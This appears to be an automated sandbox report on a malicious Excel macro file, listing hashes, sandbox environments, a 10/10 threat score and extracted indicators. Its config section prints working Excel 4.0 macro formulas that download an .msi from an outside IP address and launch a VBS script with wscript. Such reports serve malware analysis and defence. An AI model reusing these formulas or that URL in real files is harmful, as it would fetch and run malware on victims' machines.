General
-
Target
304c34f71a139a5915827427d257160e
-
Size
6KB
-
Sample
231222-adzdksdgam
-
MD5
304c34f71a139a5915827427d257160e
-
SHA1
7f70e00be516eac0e20dce5590b2a44682d3b504
-
SHA256
bb47aa8044fde53ad4eb7843b60055097f844b03a57469802363d6733d195ac1
-
SHA512
059c9884e109b0462025f38830cdfac8b6ab9b3e2334d2efe885d53627e9abe17fdc8a10184d3e3cce949604633b6ab2a4a7471982c2dd9b11d750b515d05e18
-
SSDEEP
192:NDS7uSpbrA2OmmfRk8UhHFBFYuyb98yVV+y:NsuGM2w+1FYDb98yVX
Static task
static1
Behavioral task
behavioral1
Sample
304c34f71a139a5915827427d257160e.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
304c34f71a139a5915827427d257160e.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
304c34f71a139a5915827427d257160e
-
Size
6KB
-
MD5
304c34f71a139a5915827427d257160e
-
SHA1
7f70e00be516eac0e20dce5590b2a44682d3b504
-
SHA256
bb47aa8044fde53ad4eb7843b60055097f844b03a57469802363d6733d195ac1
-
SHA512
059c9884e109b0462025f38830cdfac8b6ab9b3e2334d2efe885d53627e9abe17fdc8a10184d3e3cce949604633b6ab2a4a7471982c2dd9b11d750b515d05e18
-
SSDEEP
192:NDS7uSpbrA2OmmfRk8UhHFBFYuyb98yVV+y:NsuGM2w+1FYDb98yVX
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-